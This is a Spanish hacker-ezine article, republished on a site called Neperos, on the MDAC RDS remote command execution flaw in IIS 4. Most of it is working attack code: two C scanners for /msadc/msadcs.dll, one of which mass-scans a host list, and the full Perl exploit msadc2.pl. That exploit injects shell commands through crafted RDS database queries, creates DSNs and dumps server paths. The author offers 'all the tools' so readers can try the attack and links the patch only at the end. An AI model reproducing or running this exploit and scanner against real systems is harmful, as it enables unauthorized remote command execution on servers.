Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

MTZ: Vulnerabilidad MDAC RDS en IIS-4

eZine's profile picture
eZine lover (@eZine)
Published in 
MTeamZ
 · 10 Jun 2022

Vulnerabilidad MDAC RDS en IIS-4
by SHYSAP


1. INTRODUCCION

Esta vulnerabilidad reside en el Remote Data Service (RDS, Servicio de Datos Remoto) de Microsoft Data Acces Components (MDAC), y lo que hace es permitir a los atacantes la ejecucion de comandos como si fuesen el usuario SYSTEM o administrador (si es que este esta conectado en ese momento).


2. ENCONTRANDO VULNERABLES

Sabemos que un servidor es vulnerable cuando posee un .dll llamado msadcs.dll. Una idea que propongo hacer es un escanner para esta vulnerabilidad, realizando una peticion al servidor, del archivo /msadc/msadcs.dll, para ver si existe. Como por ejemplo se me ocurre (°es solo un ejemplo!): (°capaz que noo anda ehh°) 

/****************************************************************/ 
/* Un simple programa scanner de la vulnerabilidad MDAC RDS     */ 
/* by  SHYSAP  <shysap@web-mail.com.ar>  www.malorteam.com.ar   */ 
/* Ejemplo de uso: ./vul 200.102.144.45                         */ 
/****************************************************************/ 

#include <stdio.h> 
#include <sys/socket.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <netdb.h> 

main(int argc, char *argv[]) 
{ 
   int sock, h; 
   char *buff; 
   struct sockaddr_in sin; 
   struct hostent *host; 

   if (argc < 1) 
   { 
      printf("Uso: %s ip\n", argv[0]); 
      return 0; 
   } 

   if ((host = gethostbyname(argv[1])) == NULL) 
   { 
      printf("\nEl IP no es valido\n"); 
      return 0; 
   } 
   else 
      h = inet_ntoa(*((struct in_addr*)host->h_addr)); 

   sock = socket(AF_INET, SOCK_STREAM, 0); 
   sin.sin_family = AF_INET; 
   sin.sin_port = htons(80); 
   sin.sin_addr.s_addr = inet_addr(h); 
   bzero(&(sin.sin_zero), 8); 

   if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) 
   { 
      printf("No se ha podido conectar el socket...\n"); 
      printf("Intente nuevamente\n"); 
      close(sock); 
      return 0; 
   } 

   send(sock, "GET /msadc/msadcs.dll HTTP/1.0\n\n", 35, 0); 
   recv(sock, buff, sizeof(buff), 0); 
   printf("Recivido: %s\n", buff); 
   close(sock); 
   return 0; 
} 
-----------------------------------------------------------------------------


Bueno vasta de programas super-31337, vamos a vajar un poco el nivel!..(mmm?)
A continuacion pongo un scanner mas serio de esta vul., hecho por Xphere...
A probarlo!. 

/* 
 *  MDAC-scan.c 
 * 
 * 
 *  Code improvements + comments always welcome. 
 *  Send them to: gin@dds.nl. 
 * 
 *  #Phreak.nl Current Website: http://www.casema.net/~gin 
 *  Future Website: http://home.wanadoo.nl/~gin 
 * 
 *  -- Xphere -- 
 */ 

 

#include <stdio.h> 
#include <string.h> 
#include <netdb.h> 
#include <netinet/in.h> 
#include <signal.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <sys/file.h> 
#include <unistd.h> 

 

void catch_alarm() 
{ 
     alarm(0); 
     signal(SIGALRM, SIG_DFL); 
     exit(0); 
} 

 

int main(int argc, char *argv[]) 
{ 
     FILE *in, *out; 
     char ip[50]; 
     int pid; 
     signal(SIGCHLD, SIG_IGN); 
     signal(SIGALRM, catch_alarm); 

 
     if (argc != 3) { 
          fprintf(stderr, "\n\e[0;34m[ MDAC scanner by: "); 
	  fprintf(stderr, "Xphere -- #Phreak.nl ]\e[0m\n\n"); 
	  fprintf(stderr, "Usage: %s <host_list> <log_file> &\n", argv[0]); 
	  exit(0); 
     } 

     in = fopen(argv[1], "r"); 
     out = fopen(argv[2], "a"); 

     if (in == 0) { 
          fprintf(stderr, "Error reading %s.\n", argv[1]); 
	  exit(0); 
     } 

     if (out == 0) { 
	  fprintf(stderr, "Error creating %s.\n", argv[2]); 
	  exit(0); 
     } 

     while (fscanf(in, "%s\n", ip) != EOF) { 
	  pid = fork(); 

	  if (pid < 0) { 
	       fprintf(stderr, "Fork Error.\n"); 
	       exit(0); 
	  } 
	  else if (pid > 0) { 
	       sleep(10);     /* You got the bandwidth? */ 
	  } 
	  else if (pid == 0) { 
               alarm(25); 
	       checkh(ip, 80, argv[2]); 
	       alarm(0); 
	       exit(0); 
	  } 
     } 
     sleep(5); 
} 

 

int checkh(char *ip, int port, char *file) 
{ 
     int s, r, c; 
     char *string = "GET /msadc/msadcs.dll HTTP/1.0\r\n\r\n"; 
     char *search = "HTTP/1.1 200 OK"; 
     char serv_string[100]; 
     FILE *out; 

     struct sockaddr_in addr; 
     struct hostent *foo; 
     bzero((char *) &addr, sizeof(addr)); 
     addr.sin_family = AF_INET; 
     addr.sin_addr.s_addr = inet_addr(ip); 
     addr.sin_port= htons(port); 

     if ((foo = gethostbyname(ip)) != NULL) { 
          bcopy(foo->h_addr, (char *) &addr.sin_addr, foo->h_length); 
     } 
     else { 
	  if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) { 
	       return(0); 
	  } 
     } 

     s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
     r = connect(s, (struct sockaddr *) &addr, sizeof(addr)); 

     write(s, string, strlen(string)); 
     c = 0; 
     while (read(s, serv_string, sizeof(serv_string)) && c == 0) { 
	  if (strstr(serv_string, search) != NULL) { 
	       out = fopen(file, "a"); 
	       fputs("Server: ", out); 
	       fputs(ip, out); 
	       fputs(" runs MDAC.\n", out); 
	       fclose(out); 
	       c = 1; 
	  } 
     } 
     close(s); 
     return(0); 
}


La forma de darse cuenta que esta vulnerabilidad esta en el sistema, es fijandose en el resultado de las peticiones GET, que realizan los programas anteriores, cuando dan como resultado en el Content-Type: application/x-varg
(ojo!, esto no quiere decir que definitivamente este)

A continuacion dejo un resultado de ejemplo: 

GET /msadc/msadcs.dll HTTP/1.0 
Server: Microsoft-IIS/4.0 
Host: xxx.xxx.xxx.xxx 
Date: ... 
Content-Type: application/x-varg 
 ...

3. EXPLOTANDO VULNERABLES

Rain Forest Puppy hizo un exploit para esta vulnerabilidad, que lo que hace es lo que la teoria dice: nos permite ejecutar comandos remotamente en el servidor que posea esta vulnerabilidad. A continuacin dejo el codigo en perl que puede servir tanto para win como para linux. Un ejemplo de sintaxis seria 

super@hacker~# perl msadc2.pl -h lammerlandia.com o 200.53.65.109


(igualmente la ayuda del programa realmente ayuda) 

#!/usr/bin/perl 
# 
# MSADC/RDS 'usage' (aka exploit) script version 2 
# 
#	by rain forest puppy 
# 
#	- added UNC support, really didn't clean up code, but oh well 

use Socket; use Getopt::Std; 
getopts("e:vd:h:XRVNwcu:s:", \%args); 

print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n"; 

if (!defined $args{h} && !defined $args{R}) { 
print qq~ 
Usage: msadc.pl -h <host> { -d <delay> -X -v } 
	-h <host> 		= host you want to scan (ip or domain) 
	-d <seconds>		= delay between calls, default 1 second 
	-X			= dump Index Server path table, if available 
	-N			= query VbBusObj for NetBIOS name 
	-V			= use VbBusObj instead of ActiveDataFactory 
	-v			= verbose 
	-e			= external dictionary file for step 5 
	-u <\\\\host\\share\\file>	= use UNC file 
	-w			= Windows 95 instead of Windows NT 
	-c			= v1 compatibility (three step query) 
	-s <number>		= run only step <number> 

	Or a -R will resume a (v2) command session 

~; exit;} 

########################################################### 
# config data 

@drives=("c","d","e","f","g","h"); 

@sysdirs=("winnt","winnt35","winnt351","win","windows"); 

# we want 'wicca' first, because if step 2 made the DSN, it's ready to go 
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", 
	"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", 
	"banner", "banners", "ads", "ADCDemo", "ADCTest"); 

# this is sparse, because I don't know of many 
@sysmdbs=(	"\\catroot\\icatalog.mdb", 
		"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", 
		"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", 
		"\\system32\\certmdb.mdb", 
		"\\system32\\ias\\ias.mdb", 
		"\\system32\\ias\\dnary.mdb", 
		"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% 
@mdbs=(	"\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", 
	"\\cfusion\\cfapps\\forums\\forums_.mdb", 
	"\\cfusion\\cfapps\\forums\\data\\forums.mdb", 
	"\\cfusion\\cfapps\\security\\realm_.mdb", 
	"\\cfusion\\cfapps\\security\\data\\realm.mdb", 
	"\\cfusion\\database\\cfexamples.mdb", 
	"\\cfusion\\database\\cfsnippets.mdb", 
	"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", 
	"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", 
	"\\cfusion\\brighttiger\\database\\cleam.mdb", 
	"\\cfusion\\database\\smpolicy.mdb", 
	"\\cfusion\\database\cypress.mdb", 
	"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", 
	"\\website\\cgi-win\\dbsample.mdb", 
	"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", 
	"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" 
	);  #these are just \ 
########################################################### 

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; 
if (defined $args{v}) { $verbose=1; } else {$verbose=0;} 
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} 
if(!defined $args{R}){ $target= inet_aton($ip) 
	|| die("inet_aton problems; host doesn't exist?");} 
if (!defined $args{R}){ $ret = &has_msadc; } 

if (defined $args{X}) { &hork_idx; exit; } 
if (defined $args{N}) { &get_name; exit; } 

if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} 
if (defined $args{R}) { &load; exit; } 

print "Type the command line you want to run ($comm assumed):\n" 
	. "$comm "; 
$in=<STDIN>;    chomp $in; 
$command="$comm " . $in ; 

if (!defined $args{s} || $args{s}==1){ 
print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; 
&try_btcustmr;} 

if (!defined $args{s} || $args{s}==2){ 
print "\nStep 2: Trying to make our own DSN..."; 
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else { 
	print "<<fail>>\n"; }}   # we need to sleep to let the server catchup 

if (!defined $args{s} || $args{s}==3){ 
print "\nStep 3: Trying known DSNs..."; 
&known_dsn;} 

if (!defined $args{s} || $args{s}==4){ 
print "\nStep 4: Trying known .mdbs..."; 
&known_mdb;} 

if (!defined $args{s} || $args{s}==5){ 
if (defined $args{u}){ 
print "\xStep 5: Trying UNC..."; 
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }} 

if (!defined $args{s} || $args{s}==6){ 
if (defined $args{e}){ 
print "\nStep 6: Trying dictionary of DSN names..."; 
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }} 

print "\n\nNo luck, guess you'll have to use a real hack, eh?\n"; 
exit; 

############################################################################## 

sub sendraw { 	# this saves the whole transaction anyway 
	my ($pstr)=@_; 
	socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || 
		die("Socket problems\n"); 
	if(connect(S,pack "SnA4x8",2,80,$target)){ 
		open(OUT,">raw.out");   my @in; 
		select(S);	$|=1; 	print $pstr; 
		while(<S>){ print OUT $_; push @in, $_; 
			print STDOUT "." if(defined $args{X});} 
		close(OUT); select(STDOUT); close(S); return @in; 
	} else { die("Can't connect...\n"); }} 

############################################################################## 

sub make_header {  # make the HTTP request 
my $aa, $bb; 
if (defined $args{V}){ 
$aa="VbBusObj.VbBusObjCls.GetRecordset"; 
$bb="2"; 
} else { 
$aa="AdvancedDataFactory.Query"; 
$bb="3";} 

$msadc=<<EOT 
POST /msadc/msadcs.dll/$aa HTTP/1.1 
User-Agent: ACTIVEDATA 
Host: $ip 
Content-Length: $clen 
Connection: Keep-Alive 

ADCClientVersion:01.06 
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb 

--!ADM!ROX!YOUR!WORLD! 
Content-Type: application/x-varg 
Content-Length: $reqlen 

EOT 
; 
$msadc=~s/\n/\r\n/g; 
return $msadc;} 

############################################################################## 

sub make_req {  # make the RDS request 
my ($switch, $p1, $p2)=@_; 
my $req=""; my $t1, $t2, $query, $dsn; 

if ($switch==1){ # this is the btcustmr.mdb query 
$query="Select * from Customers where City='|shell(\"$command\")|'"; 
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . 
	$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";} 

elsif ($switch==2){ # this is general make table query 
$query="create table AZZ (B int, C varchar(10))"; 
$dsn="$p1";} 

elsif ($switch==3){ # this is general exploit table query 
$query="select * from AZZ where C='|shell(\"$command\")|'"; 
$dsn="$p1";} 

elsif ($switch==4){ # attempt to hork file info from index server 
$query="select path from scope()"; 
$dsn="Provider=MSIDXS;";} 

elsif ($switch==5){ # bad query 
$query="select"; 
$dsn="$p1";} 

elsif ($switch==6){ # this is table-independant query (new) 
$query="select * from MSysModules where name='|shell(\"$command\")|'"; 
$dsn="$p1";} 

$t1= make_unicode($query); 
$t2= make_unicode($dsn); 
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; } 
$req.= "\x08\x00" . pack ("S1", length($t1)); 
$req.= "\x00\x00" . $t1 ; 
$req.= "\x08\x00" . pack ("S1", length($t2)); 
$req.= "\x00\x00" . $t2 ; 
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n"; 
return $req;} 

############################################################################## 

sub make_unicode { # quick little function to convert to unicode 
my ($in)=@_; my $out; 
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; } 
return $out;} 

############################################################################## 

sub rdo_success {  # checks for RDO return success (this is kludge) 
my (@in) = @_; my $base=content_start(@in); 
if($in[$base]=~/multipart\/mixed/){ 
return 1 if( $in[$base+10]=~/^\x09\x00/ );} 
return 0;} 

############################################################################## 

sub make_dsn {  # this (tries to) make a DSN for us 
print "\nMaking DSN: "; 
foreach $drive (@drives) { 
print "$drive: "; 
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" . 
	"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq=" 
	. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n"); 
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#; 
return 0 if $2 eq "404"; # not found/doesn't exist 
if($2 eq "200") { 
  foreach $line (@results) { 
    return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}} 
} return 0;} 

############################################################################## 

sub verify_exists { 
my ($page)=@_; 
my @results=sendraw("GET $page HTTP/1.0\n\n"); 
return $results[0];} 

############################################################################## 

sub try_btcustmr { 

foreach $dir (@sysdirs) { 
 print "$dir -> "; # fun status so you can see progress 
 foreach $drive (@drives) { 
 print "$drive: ";  # ditto 
$reqlen=length( make_req(1,$drive,$dir) ) - 28; 
$reqlenlen=length( "$reqlen" ); 
$clen= 206 + $reqlenlen + $reqlen; 

my @results=sendraw(make_header() . make_req(1,$drive,$dir)); 
if (rdo_success(@results)){print "Success!\n"; 

save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;"); 
	exit;} 
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} 

############################################################################## 

sub odbc_error { 
my (@in)=@_; my $base; 
my $base = content_start(@in); 
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this 
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
return $in[$base+4].$in[$base+5].$in[$base+6];} 
print "\nNON-STANDARD error.  Please sent this info to rfp\@wiretrip.net:\n"; 
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . 
	$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} 

############################################################################## 

sub verbose { 
my ($in)=@_; 
return if !$verbose; 
print STDOUT "\n$in\n";} 

############################################################################## 

sub save { 
my ($p1)=@_; my $ropt=""; 
open(OUT, ">rds.save") || print "Problem saving parameters...\n"; 
if (defined $args{c}){ $ropt="c ";} 
if (defined $args{V}){ $ropt.="V ";} 
if (defined $args{w}){ $ropt.="w ";} 
print OUT "v2\n$ip\n$ropt\n$p1\n"; 
close OUT;} 

############################################################################## 

sub load { 
my ($action)=@_; 
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};"; 
open(IN,"<rds.save") || die("Couldn't open rds.save\n"); 
@p=<IN>; close(IN); 
die("Wrong rds.save version") if $p[0] ne "v2\n"; 
$ip="$p[1]"; $ip=~s/\n//g; 
$target= inet_aton($ip) || die("inet_aton problems"); 
print "Resuming to $ip ..."; 
@switches=split(/ /,$p[2]); 
foreach $switch (@switches) { 
	$args{$switch}="1";} 

if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} 
print "Type the command line you want to run ($comm assumed):\n" 
	. "$comm "; 
$in=<STDIN>;    chomp $in; 
$command="$comm " . $in ; 

$torun="$p[3]"; $torun=~s/\n//g; 
if($torun=~/btcustmr/){ 
	$args{'c'}="1";}   # this is a kludge to make it work 

if($torun=~/^dbq/){ $torun=$drvst.$torun; } 

if(run_query("$torun")){ 
	print "Success!\n";} else { print "failed\n"; } 
exit;} 

############################################################################## 

sub create_table { 
return 1 if (!defined $args{c}); 
return 1 if (defined $args{V}); 
my ($in)=@_; 
$reqlen=length( make_req(2,$in,"") ) - 28; 
$reqlenlen=length( "$reqlen" ); 
$clen= 206 + $reqlenlen + $reqlen; 
my @results=sendraw(make_header() . make_req(2,$in,"")); 
return 1 if rdo_success(@results); 
my $temp= odbc_error(@results);  verbose($temp); 
return 1 if $temp=~/Table 'AZZ' already exists/; 
return 0;} 

############################################################################## 

sub known_dsn { 
foreach $dSn (@dsns) { 
	print "."; 
	next if (!is_access("DSN=$dSn")); 
	if(create_table("DSN=$dSn")){ 
	if(run_query("DSN=$dSn")){ 
	print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";} 

############################################################################## 

sub is_access { 
my ($in)=@_; 
return 1 if (!defined $args{c}); 
return 1 if (defined $args{V}); 
$reqlen=length( make_req(5,$in,"") ) - 28; 
$reqlenlen=length( "$reqlen" ); 
$clen= 206 + $reqlenlen + $reqlen; 
my @results=sendraw(make_header() . make_req(5,$in,"")); 
my $temp= odbc_error(@results); 
verbose($temp); return 1 if ($temp=~/Microsoft Access/); 
return 0;} 

############################################################################## 

sub run_query { 
my ($in)=@_; my $req; 
if (defined $args{c}){$req=3;} else {$req=6;} 
$reqlen=length( make_req($req,$in,"") ) - 28; 

$reqlenlen=length( "$reqlen" ); 
$clen= 206 + $reqlenlen + $reqlen; 
my @results=sendraw(make_header() . make_req($req,$in,"")); 
return 1 if rdo_success(@results); 
my $temp= odbc_error(@results);  verbose($temp); 
return 0;} 

############################################################################## 

sub known_mdb { 
my @drives=("c","d","e","f","g"); 
my @dirs=("winnt","winnt35","winnt351","win","windows"); 
my $dir, $drive, $mdb; 
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; 

foreach $drive (@drives) { 
 foreach $dir (@sysdirs){ 
  foreach $mdb (@sysmdbs) { 
   print "."; 
   if(create_table($drv.$drive.":\\".$dir.$mdb)){ 
    if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ 
     print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit; 
    }}}}} 

 foreach $drive (@drives) { 
  foreach $mdb (@mdbs) { 
   print "."; 
   if(create_table($drv.$drive.":".$mdb)){ 
    if(run_query($drv.$drive.":".$mdb)){ 
     print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit; 
    }}}} 
} 

############################################################################## 

sub hork_idx { 
print "\nAttempting to dump Index Server tables...\n"; 
print "  NOTE:  Sometimes this takes a while, other times it stalls\n\n"; 
$reqlen=length( make_req(4,"","") ) - 28; 
$reqlenlen=length( "$reqlen" ); 
$clen= 206 + $reqlenlen + $reqlen; 
my @results=sendraw(make_header() . make_req(4,"","")); 
if (rdo_success(@results)){ 
my $max=@results; my $c; my %d; 
for($c=19; $c<$max; $c++){ 
	$results[$c]=~s/\x00//g; 
	$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; 
	$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; 
	$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; 
	$d{"$1$2"}="";} 
foreach $c (keys %d){ print "$c\n"; } 
} else {print "Index server not installed/query failed\n"; }} 

############################################################################## 

sub dsn_dict { 
open(IN, "<$args{e}") || die("Can't open external dictionary\n"); 
while(<IN>){ 
	$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; 
	next if (!is_access("DSN=$dSn")); 
	if(create_table("DSN=$dSn")){ 
	if(run_query("DSN=$dSn")){ 
	print "Success!\n"; save ("dsn=$dSn"); exit; }}} 
print "\n"; close(IN);} 

############################################################################## 

sub content_start { # this will take in the server headers 
my (@in)=@_; my $c; 
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers 
 if($in[$c] =~/^\x0d\x0a/){ 
  if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } 
  else { return $c+1; }}} 
return -1;} # it should never get here actually 

############################################################################## 

sub funky { 
my (@in)=@_; my $error=odbc_error(@in); 
if($error=~/ADO could not find the specified provider/){ 
print "\nServer returned an ADO miscofiguration message\nAborting.\n"; 
exit;} 
if($error=~/A Handler is required/){ 
print "\nServer has custom handler filters (they most likely are patched)\n"; 
exit;} 
if($error=~/specified Handler has denied Access/){ 
print "\nADO handlers denied access (they most likely are patched)\n"; 
exit;} 
if($error=~/server has denied access/){ 
print "\nADO handlers denied access (they most likely are patched)\n"; 
exit;}} 

############################################################################## 

sub has_msadc { 
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"); 
my $base=content_start(@results); 
return if($results[$base]=~/Content-Type: application\/x-varg/); 
my @s=grep("^Server:",@results); 
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" } 
else { print "/msadc/msadcs.dll was not found.\n";} 
exit;} 

############################################################################## 

sub use_unc { 
$uncpath=$args{u}; 
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq="; 
if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){ 
	print   "Your UNC path sucks.  You need the following format:\n". 
		"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; } 

if(create_table($driverline.$uncpath)){ 
  if(run_query($driverline.$uncpath)){ 
     print "Success!\n"; save ("dbq=".$uncpath); exit;}} 
} 

############################################################################## 

sub get_name { # this was added last minute 
my $msadc=<<EOT 
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1 
User-Agent: ACTIVEDATA 
Host: $ip 
Content-Length: 126 
Connection: Keep-Alive 

ADCClientVersion:01.06 
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0 

--!ADM!ROX!YOUR!WORLD!-- 
EOT 
;  $msadc=~s/\n/\r\n/g; 
my @results=sendraw($msadc); 
my $base=content_start(@results); 
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g; 
print "Machine name: $results[$base+6]\n";} 

############################################################################## 
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm, 
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and 
# good friends!), wiretrip, l0pht, nmrc & all of phrack 
# 
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice 
# 
# I wish I could really name everyone, but I can't.  Don't feel slighted if 
# your not on the list... :) 
##############################################################################

4. DESPEDIDA

Bueno espero hayan entendido y puedan probar esta vulnerabilidad, ya que les doy todas las herramientas, no se pueden quejar...
Ya saben que por cualquier duda me pueden consultar y si no se las puedo responder, averiguare sobre lo que me preguntes. Nunca esta de mas aprender algo nuevo, ni viejo...
Para la "solucion" a este problema:
http://www.microsoft.com/security/bulletins/ms99-025faq.asp

SHYSAP ---> shysap@web-mail.com.ar
^^^^^^ ---> www.malorteam.com.ar

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
8 May 2024
I like the old PC-viruses. They were very popular in the 90s
guest's profile picture
@guest
8 May 2024
Sabung Ayam Online
guest's profile picture
@guest
7 May 2024
I like the idea of using Caraffa to color the beer
guest's profile picture
@guest
7 May 2024
Sabung Ayam Online
guest's profile picture
@guest
6 May 2024
Situs Sabung Ayam Digmaan
AniphaeS's profile picture
@AniphaeS
5 May 2024
Yes, you are right! The correct spelling is " QUEENS". Thanks a lot for the warning 🙂
guest's profile picture
@guest
5 May 2024
Daikatana was my favorite game on the Nintendo64. I have played it a lot but never managed to complete it 100%
Francesco's profile picture
Francesco Arca (@Francesco)
5 May 2024
Shouldn't be called 'Queens'?
guest's profile picture
@guest
5 May 2024
How long does it take to make beer at home?
guest's profile picture
@guest
5 May 2024
lot of interesting information
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT